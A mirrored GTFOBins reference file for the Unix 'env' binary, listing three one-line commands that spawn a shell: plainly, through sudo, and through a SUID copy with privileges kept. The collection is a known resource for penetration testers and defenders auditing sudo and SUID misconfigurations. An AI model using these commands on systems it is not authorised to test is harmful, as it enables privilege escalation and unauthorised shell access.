1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-01-17 21:11:33 +01:00
GTFOBins.github.io/_gtfobins/env.md
2018-05-25 15:30:02 +02:00

10 lines
156 B
Markdown

---
functions:
execute-interactive:
- code: env /bin/sh
sudo-enabled:
- code: sudo env /bin/sh
suid-enabled:
- code: ./env /bin/sh -p
---